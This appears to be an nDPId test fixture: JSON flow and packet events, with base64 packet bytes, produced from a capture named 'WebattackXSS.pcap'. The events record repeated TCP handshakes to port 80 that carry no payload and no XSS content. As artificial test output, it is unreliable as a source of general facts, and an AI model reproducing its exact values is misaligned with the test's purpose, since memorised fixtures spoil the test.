-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1499347177249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347177249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XzdAAD4GZqGsEAABwKgKMtSQAFC5seum7bFx0oAQAOXldQAAAQEICgE5tJMD44YJ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347178540,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347178540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRdAAD4GGLmsEAABwKgKMtSeAFA54BjBAAAAAKACchCAZAAAAgQFtAQCCAoBObXWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1J7RuWV+OeAYwqAScSC+2wAAAgQFtAQCCAoD44dMATm11gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1499347178541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347178541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRhAAD4GGMCsEAABwKgKMtSeAFA54BjC0bllf4AQAOVd4wAAAQEICgE5tdYD44dM"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347181178,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181178,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iI9AAD4GPUGsEAABwKgKMtS4AFBWujDmAAAAAKACchBIuAAAAgQFtAQCCAoBObhpAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1LiEJRdhVrow56AScSAgTQAAAgQFtAQCCAoD44ngATm4aQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1499347181179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347181179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iJBAAD4GPUisEAABwKgKMtS4AFBWujDnhCUXYoAQAOW\/UwAAAQEICgE5uGoD44ng"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347182435,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347182435,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IhAAD4G6UesEAABwKgKMtTGAFDgpGUsAAAAAKACchCJPgAAAgQFtAQCCAoBObmkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1MbnFi1c4KRlLaAScSDmrAAAAgQFtAQCCAoD44saATm5pAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1499347182436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347182436,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03IlAAD4G6U6sEAABwKgKMtTGAFDgpGUt5xYtXYAQAOWFtAAAAQEICgE5uaQD44sa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347183714,"flow_last_seen":1499347183714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347183714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1499347183714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/NBAAD4GyP+sEAABwKgKMtTUAFAdl0YzAAAAAKACchBp+AAAAgQFtAQCCAoBObrjAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1499347183715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183715,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1NRZfFQSHZdGNKAScSAtCwAAAgQFtAQCCAoD44xaATm64wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1499347183715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347183715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/NFAAD4GyQasEAABwKgKMtTUAFAdl0Y0WXxUE4AQAOXMEQAAAQEICgE5uuQD44xa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347186286,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347186286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C2FAAD4Gum+sEAABwKgKMtTuAFDJ67YHAAAAAKACchBLMgAAAgQFtAQCCAoBOb1mAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1O6dKYTkyeu2CKAScSCXQgAAAgQFtAQCCAoD447dATm9ZgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1499347186287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347186287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C2JAAD4GunasEAABwKgKMtTuAFDJ67YInSmE5YAQAOU2SQAAAQEICgE5vWcD447d"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347187548,"flow_last_seen":1499347187548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347187548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1499347187548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aSdAAD4GXKmsEAABwKgKMtT8AFBu8NeFAAAAAKACchCDZQAAAgQFtAQCCAoBOb6iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1499347187549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1PzTvrB4bvDXhqAScSBsEQAAAgQFtAQCCAoD45AYATm+ogEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1499347187549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347187549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aShAAD4GXLCsEAABwKgKMtT8AFBu8NeG076weYAQAOULGQAAAQEICgE5vqID45AY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347188799,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347188799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dE1AAD4GUYOsEAABwKgKMtUKAFDFBMuWAAAAAKACchA3+QAAAgQFtAQCCAoBOb\/bAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Qqv+uT2xQTLl6AScSAOsgAAAgQFtAQCCAoD45FRATm\/2wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1499347188800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347188800,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dE5AAD4GUYqsEAABwKgKMtUKAFDFBMuXr\/rk94AQAOWtuQAAAQEICgE5v9sD45FR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347190051,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347190051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88xNAAD4G0rysEAABwKgKMtUYAFBhEDIAAAAAAKACchA0PgAAAgQFtAQCCAoBOcETAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1RhSQOITYRAyAaAScSBqWwAAAgQFtAQCCAoD45KKATnBEwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1499347190052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347190052,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08xRAAD4G0sOsEAABwKgKMtUYAFBhEDIBUkDiFIAQAOUJYgAAAQEICgE5wRQD45KK"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347191299,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a9RAAD4GWfysEAABwKgKMtUmAFBoHamYAAAAAKACchC0UQAAAgQFtAQCCAoBOcJMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Sai+IEWaB2pmaAScSD5ewAAAgQFtAQCCAoD45PCATnCTAEDAwc="} 
